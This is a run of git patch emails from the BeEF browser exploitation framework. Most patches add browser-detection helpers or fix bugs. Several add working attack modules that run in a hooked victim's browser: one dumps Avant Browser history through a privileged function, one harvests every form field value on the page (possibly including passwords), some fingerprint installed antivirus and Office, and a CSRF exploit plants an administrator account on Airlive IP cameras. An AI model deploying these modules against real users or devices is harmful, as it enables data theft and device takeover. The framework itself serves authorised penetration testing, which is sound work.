Date: Sun, 2 Jun 2013 03:14:29 +0930
Subject: [PATCH 320/397] Add `beef.browser.isA()` to detect Avant Browser

Fixes issue #774
---
 core/main/client/browser.js | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 4efc5d63c..2d32c686e 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -19,6 +19,14 @@ beef.browser = {
         return navigator.userAgent;
     },
 
+    /**
+     * Returns true if Avant Browser.
+     * @example: beef.browser.isA()
+     */
+    isA:function () {
+        return window.navigator.userAgent.match(/Avant TriCore/) != null;
+    },
+
     /**
      * Returns true if IE6.
      * @example: beef.browser.isIE6()

From 7fdfcc3ef0bdac7ec0d0563e78b863c81ac86bf8 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 2 Jun 2013 03:19:05 +0930
Subject: [PATCH 321/397] Add `beef.browser.isA()` to avant_steal_history
 module

Part of issue #774
---
 .../browser/avant_steal_history/command.js    | 38 +++++++++----------
 .../browser/avant_steal_history/config.yaml   |  4 +-
 2 files changed, 19 insertions(+), 23 deletions(-)

diff --git a/modules/browser/avant_steal_history/command.js b/modules/browser/avant_steal_history/command.js
index 6eb89b905..faefeaf2b 100644
--- a/modules/browser/avant_steal_history/command.js
+++ b/modules/browser/avant_steal_history/command.js
@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 
diff --git a/modules/browser/avant_steal_history/config.yaml b/modules/browser/avant_steal_history/config.yaml
index ab161494f..bace4b5c0 100644
--- a/modules/browser/avant_steal_history/config.yaml
+++ b/modules/browser/avant_steal_history/config.yaml
@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

From 5252bea54ace2ce0ef1b9f15980aaeb90253530f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 2 Jun 2013 05:11:45 +0930
Subject: [PATCH 322/397] Add Get Form Values module

This module retrieves the name, type, and value of all input
fields for all forms on the page.
---
 .../hooked_domain/get_form_values/command.js  | 28 +++++++++++++++++++
 .../hooked_domain/get_form_values/config.yaml | 15 ++++++++++
 .../hooked_domain/get_form_values/module.rb   | 14 ++++++++++
 3 files changed, 57 insertions(+)
 create mode 100644 modules/browser/hooked_domain/get_form_values/command.js
 create mode 100644 modules/browser/hooked_domain/get_form_values/config.yaml
 create mode 100644 modules/browser/hooked_domain/get_form_values/module.rb

diff --git a/modules/browser/hooked_domain/get_form_values/command.js b/modules/browser/hooked_domain/get_form_values/command.js
new file mode 100644
index 000000000..05cc73971
--- /dev/null
+++ b/modules/browser/hooked_domain/get_form_values/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var form_data = new Array();
+
+	// loop through all forms
+	for (var f=0; f < document.forms.length; f++) {
+		// store type,name,value for all input fields
+		for (var i=0; i < document.forms[f].elements.length; i++) {
+			form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
+		}
+	}
+
+	// return form data
+	if (form_data.length) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
+	// return if no input fields were found
+	} else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
+	}
+
+});
+
diff --git a/modules/browser/hooked_domain/get_form_values/config.yaml b/modules/browser/hooked_domain/get_form_values/config.yaml
new file mode 100644
index 000000000..819416099
--- /dev/null
+++ b/modules/browser/hooked_domain/get_form_values/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_form_values:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Form Values"
+            description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/browser/hooked_domain/get_form_values/module.rb b/modules/browser/hooked_domain/get_form_values/module.rb
new file mode 100644
index 000000000..adc924fc2
--- /dev/null
+++ b/modules/browser/hooked_domain/get_form_values/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_form_values < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['form_data'] = @datastore['form_data']
+		save content
+	end
+
+end

From dbabb379fb7527aae7daa410f56b1bc1d52140ce Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 2 Jun 2013 05:14:33 +0930
Subject: [PATCH 323/397] Add Iceweasel detection in browser.js

---
 core/main/client/browser.js | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 2d32c686e..a380d29a0 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -27,6 +27,14 @@ beef.browser = {
         return window.navigator.userAgent.match(/Avant TriCore/) != null;
     },
 
+    /**
+     * Returns true if Iceweasel.
+     * @example: beef.browser.isI()
+     */
+    isI:function () {
+        return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
+    },
+
     /**
      * Returns true if IE6.
      * @example: beef.browser.isIE6()

From a2b627c8ae411523a3e84e15ccdc4edd2172bd87 Mon Sep 17 00:00:00 2001
From: Nbblrr <Nbblrr>
Date: Fri, 14 Jun 2013 00:07:00 +0200
Subject: [PATCH 324/397] Add module to detect bitdefender 2012. Closes #902

---
 modules/host/detect_bitdefender2012/command.js  | 17 +++++++++++++++++
 modules/host/detect_bitdefender2012/config.yaml | 15 +++++++++++++++
 modules/host/detect_bitdefender2012/module.rb   | 13 +++++++++++++
 3 files changed, 45 insertions(+)
 create mode 100644 modules/host/detect_bitdefender2012/command.js
 create mode 100644 modules/host/detect_bitdefender2012/config.yaml
 create mode 100644 modules/host/detect_bitdefender2012/module.rb

diff --git a/modules/host/detect_bitdefender2012/command.js b/modules/host/detect_bitdefender2012/command.js
new file mode 100644
index 000000000..c276a3098
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var temp=document.body.innerHTML;
+    var key="netdefender/hui/ndhui.js";
+    if(temp.indexOf(key)>0) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
+    } else {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
+    };
+
+});
+
diff --git a/modules/host/detect_bitdefender2012/config.yaml b/modules/host/detect_bitdefender2012/config.yaml
new file mode 100644
index 000000000..e2f4e621b
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_bitdefender2012:
+            enable: true
+            category: "Host"
+            name: "Detect Bit Defender 2012"
+            description: "This module detect the javascript code automatically included by Bitdefender 2012"
+            authors: ["nbblrr"]
+            target:
+                working: ["ALL"]
diff --git a/modules/host/detect_bitdefender2012/module.rb b/modules/host/detect_bitdefender2012/module.rb
new file mode 100644
index 000000000..421265c09
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/module.rb
@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Detect_bitdefender2012 < BeEF::Core::Command
+
+  def post_execute
+    save({'BitDefender' => @datastore['bitdefender']})
+  end
+
+end

From 2b473bfda929fcfb21415c882b0c4d18508c5d4d Mon Sep 17 00:00:00 2001
From: Nbblrr <Nbblrr>
Date: Fri, 14 Jun 2013 00:39:39 +0200
Subject: [PATCH 325/397] Add module which detect MS Office version. Closes
 #903

---
 modules/browser/detect_office/command.js  | 44 +++++++++++++++++++++++
 modules/browser/detect_office/config.yaml | 16 +++++++++
 modules/browser/detect_office/module.rb   | 14 ++++++++
 3 files changed, 74 insertions(+)
 create mode 100644 modules/browser/detect_office/command.js
 create mode 100644 modules/browser/detect_office/config.yaml
 create mode 100644 modules/browser/detect_office/module.rb

diff --git a/modules/browser/detect_office/command.js b/modules/browser/detect_office/command.js
new file mode 100644
index 000000000..c00cbda20
--- /dev/null
+++ b/modules/browser/detect_office/command.js
@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+
diff --git a/modules/browser/detect_office/config.yaml b/modules/browser/detect_office/config.yaml
new file mode 100644
index 000000000..bd5fa6954
--- /dev/null
+++ b/modules/browser/detect_office/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]
diff --git a/modules/browser/detect_office/module.rb b/modules/browser/detect_office/module.rb
new file mode 100644
index 000000000..eb5d02110
--- /dev/null
+++ b/modules/browser/detect_office/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

From d40486c391aa4c9858a88050da51446cfd11a0df Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 14 Jun 2013 15:28:35 +0930
Subject: [PATCH 326/397] Add airlive_ip_camera_csrf module

---
 .../camera/airlive_ip_camera_csrf/command.js  | 30 +++++++++++++++++++
 .../camera/airlive_ip_camera_csrf/config.yaml | 18 +++++++++++
 .../camera/airlive_ip_camera_csrf/module.rb   | 20 +++++++++++++
 3 files changed, 68 insertions(+)
 create mode 100644 modules/exploits/camera/airlive_ip_camera_csrf/command.js
 create mode 100644 modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
 create mode 100644 modules/exploits/camera/airlive_ip_camera_csrf/module.rb

diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/command.js b/modules/exploits/camera/airlive_ip_camera_csrf/command.js
new file mode 100644
index 000000000..b4bb27d9e
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/command.js
@@ -0,0 +1,30 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base  = '<%= @base %>'; 
+  var path  = 'cgi-bin/admin/usrgrp.cgi';
+  var user  = '<%= @user %>';
+  var pass  = '<%= @pass %>';
+
+  var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
+    [{'type':'hidden', 'name':'user',     'value':user},
+     {'type':'hidden', 'name':'pwd',      'value':pass},
+     {'type':'hidden', 'name':'grp',      'value':'administrator'},
+     {'type':'hidden', 'name':'sgrp',     'value':'ptz'},
+     {'type':'hidden', 'name':'action',   'value':'add'},
+     {'type':'hidden', 'name':'redirect', 'value':''}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
new file mode 100644
index 000000000..05c6fd00a
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# For more information see:
+# http://www.exploit-db.com/exploits/26174/
+##
+beef:
+    module:
+        airlive_add_user_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Airlive Add User CSRF"
+            description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
+            authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/camera/airlive_ip_camera_csrf/module.rb b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
new file mode 100644
index 000000000..22463ca92
--- /dev/null
+++ b/modules/exploits/camera/airlive_ip_camera_csrf/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Airlive_add_user_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root',  'value' => 'http://192.168.0.1/'},
+			{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
+			{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 96f763b7e0fa544994e363dbc83bab9f5a6dfbf8 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 15 Jun 2013 13:41:41 +0800
Subject: [PATCH 327/397] Chrome 27/28 detection. Fixes Issue #905

---
 core/main/client/browser.js | 28 +++++++++++++++++++++++++++-
 1 file changed, 27 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index a380d29a0..67186bc43 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -476,12 +476,28 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 27.
+     * @example: beef.browser.isC27()
+     */
+    isC27:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 27) ? true : false);
+    },
+
+    /**
+     * Returns true if Chrome 28.
+     * @example: beef.browser.isC28()
+     */
+    isC28:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 28) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26() || this.isC27() || this.isC28();
     },
 
     /**
@@ -563,6 +579,8 @@ beef.browser = {
             C24:this.isC24(), // Chrome 24
             C25:this.isC25(), // Chrome 25
             C26:this.isC26(), // Chrome 26
+            C27:this.isC27(), // Chrome 27
+            C28:this.isC28(), // Chrome 28
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -706,6 +724,14 @@ beef.browser = {
             return '26'
         }
         ;    // Chrome 26
+        if (this.isC27()) {
+            return '27'
+        }
+        ;    // Chrome 27
+        if (this.isC28()) {
+            return '28'
+        }
+        ;    // Chrome 28
         if (this.isFF2()) {
             return '2'
         }

From dbebf12d27e18ab1eaec9957a5290969499e9c32 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 15 Jun 2013 13:45:24 +0800
Subject: [PATCH 328/397] Update to browser_filter. See Issue #906

---
 core/filters/browser.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index ca656e86b..73d5cd131 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

From 473f34939481c05d8a267915466b5b6193f8553c Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 15 Jun 2013 13:48:05 +0800
Subject: [PATCH 329/397] Missing apostrophe in PHP-5.3.9-dos module.rb. This
 was breaking Rake. Make sure you run rake peeps before pushing!

---
 modules/exploits/php-5.3.9-dos/module.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
index 1ae637ae4..a84fa99f1 100644
--- a/modules/exploits/php-5.3.9-dos/module.rb
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -14,7 +14,7 @@ class Php_dos < BeEF::Core::Command
 	def post_execute
 		content = {}
 		content['result'] = @datastore['result'] if not @datastore['result'].nil?
-		content['fail]    = @datastore['fail']   if not @datastore['fail'].nil?
+		content['fail']    = @datastore['fail']   if not @datastore['fail'].nil?
 		save content
 	end
 

From 2e68470d234bfe812da038a369ebe47e9b60e518 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 16 Jun 2013 14:27:12 +0800
Subject: [PATCH 330/397] Android OS Icon should now display. See Issue #907

---
 core/main/models/browserdetails.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 93d290e8c..6057f125e 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -80,6 +80,7 @@ module Models
       
       return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
       return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
+      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
       return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
       return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
       return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
       return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
       return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
       return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
-      return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
     
       BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
     end

From dab58f0e61e1a9088c1f2a2690db758b9e371143 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 16 Jun 2013 14:49:39 +0800
Subject: [PATCH 331/397] Updated hardware constants better detects and
 displays pure Nexus phones. Issue #908

---
 core/main/constants/hardware.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb
index 1338cd726..1b85dd992 100644
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

From 0dd499c71a9d8dd9de1af350707adc472bc102ab Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sun, 16 Jun 2013 16:19:58 +0800
Subject: [PATCH 332/397] Updated browser detection to capture Chrome under
 iOS. See Issue #909

---
 core/filters/browser.rb     |   2 +-
 core/main/client/browser.js | 132 +++++++++++++++++++++++++++++++++++-
 2 files changed, 132 insertions(+), 2 deletions(-)

diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index 73d5cd131..1ecdd0023 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 67186bc43..5b427ffb3 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -420,6 +420,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 19.
+     * @example: beef.browser.isC19iOS()
+     */
+    isC19iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 20.
      * @example: beef.browser.isC20()
@@ -428,6 +436,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 20.
+     * @example: beef.browser.isC20iOS()
+     */
+    isC20iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 21.
      * @example: beef.browser.isC21()
@@ -436,6 +452,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 21.
+     * @example: beef.browser.isC21iOS()
+     */
+    isC21iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 22.
      * @example: beef.browser.isC22()
@@ -444,6 +468,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 22.
+     * @example: beef.browser.isC22iOS()
+     */
+    isC22iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 23.
      * @example: beef.browser.isC23()
@@ -452,6 +484,14 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome for iOS 23.
+     * @example: beef.browser.isC23iOS()
+     */
+    isC23iOS:function () {
+        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
+    },
+
     /**
      * Returns true if Chrome 24.
      * @example: beef.browser.isC24()
@@ -460,6 +500,14 @@ beef.browser = {
